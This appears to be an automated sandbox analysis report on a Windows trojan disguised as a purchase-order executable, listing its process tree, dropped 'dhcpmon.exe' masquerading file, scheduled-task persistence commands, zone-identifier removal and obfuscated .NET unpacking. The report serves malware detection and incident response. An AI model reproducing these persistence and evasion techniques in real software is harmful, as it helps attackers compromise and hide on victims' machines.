Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A3D292	0_2_00A3D292
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A426E6	0_2_00A426E6
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A45AC9	0_2_00A45AC9
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A43EDF	0_2_00A43EDF
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A3CA28	0_2_00A3CA28
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A45207	0_2_00A45207
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A3C610	0_2_00A3C610
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A3B26B	0_2_00A3B26B
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A3CE5D	0_2_00A3CE5D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_012D7ABE	2_2_012D7ABE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CDB2A8	2_2_02CDB2A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CD2FA8	2_2_02CD2FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CD23A0	2_2_02CD23A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CD3850	2_2_02CD3850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CD89D8	2_2_02CD89D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CD969F	2_2_02CD969F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CD306F	2_2_02CD306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_02CD95D8	2_2_02CD95D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 10_2_05781DF8	10_2_05781DF8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 10_2_05780708	10_2_05780708
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_00046D08	12_2_00046D08
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_00046950	12_2_00046950
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_0004692F	12_2_0004692F
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 12_2_047E0708	12_2_047E0708
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 15_2_00F6692F	15_2_00F6692F
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 15_2_00F66950	15_2_00F66950
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 15_2_00F66D08	15_2_00F66D08

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_052E180A NtQuerySystemInformation,		2_2_052E180A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_052E17E8 NtQuerySystemInformation,		2_2_052E17E8

Source: P0 (2021)-2790 new order.exe, 00000000.00000003.218277543.0000000002976000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs P0 (2021)-2790 new order.exe

Source: dhcpmon.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: P0 (2021)-2790 new order.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe 'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe'
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7C69.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp8052.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7C69.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp8052.tmp'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_052E149A AdjustTokenPrivileges,		2_2_052E149A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_052E1463 AdjustTokenPrivileges,		2_2_052E1463

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7C69.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@16/11@0/1

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A31450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,

0_2_00A31450

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A31450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,

0_2_00A31450

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{6e073bd7-7c11-48c2-8a90-355dddea56c0}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: dhcpmon.exe, 0000000C.00000002.233299826.0000000000042000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000000.243062538.0000000000F62000.00000002.00020000.sdmp, dhcpmon.exe.2.dr	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: dhcpmon.exe, 0000000C.00000002.233299826.0000000000042000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000000.243062538.0000000000F62000.00000002.00020000.sdmp, dhcpmon.exe.2.dr	Binary or memory string: MSBuild MyApp.csproj /t:Clean /p:Configuration=Debug
Source: dhcpmon.exe, 0000000C.00000002.233299826.0000000000042000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000000.243062538.0000000000F62000.00000002.00020000.sdmp, dhcpmon.exe.2.dr	Binary or memory string: *.sln+AmbiguousProjectError'MissingProjectError)ProjectNotFoundError)InvalidPropertyError
Source: dhcpmon.exe	Binary or memory string: *.sln
Source: dhcpmon.exe, 0000000F.00000002.247479470.0000000003671000.00000004.00000001.sdmp	Binary or memory string: q)C:\Program Files (x86)\DHCP Monitor\.sln

Source: 2.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: P0 (2021)-2790 new order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: P0 (2021)-2790 new order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: P0 (2021)-2790 new order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: P0 (2021)-2790 new order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: P0 (2021)-2790 new order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: P0 (2021)-2790 new order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: P0 (2021)-2790 new order.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: P0 (2021)-2790 new order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbind source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: indows\MSBuild.pdbpdbild.p source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: P0 (2021)-2790 new order.exe, 00000000.00000003.219629284.0000000002860000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: P0 (2021)-2790 new order.exe, 00000000.00000003.219629284.0000000002860000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb\W44FX source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbSy source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.pdb source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdb F source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: dhcpmon.exe, dhcpmon.exe.2.dr
Source:	Binary string: System.pdb source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdbse source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp

Source: P0 (2021)-2790 new order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: P0 (2021)-2790 new order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: P0 (2021)-2790 new order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: P0 (2021)-2790 new order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: P0 (2021)-2790 new order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 2.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A34055 push ecx; ret	0_2_00A34068
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_012D74AC push ecx; ret	2_2_012D74AD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_012D74B8 push ebp; ret	2_2_012D74B9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_012D769D push es; ret	2_2_012D76A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_012D9D78 pushad ; retf	2_2_012D9D79
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_012D9D74 push eax; retf	2_2_012D9D75

Source: 2.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7C69.tmp'

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A31450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,

0_2_00A31450

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A3340B RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00A3340B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
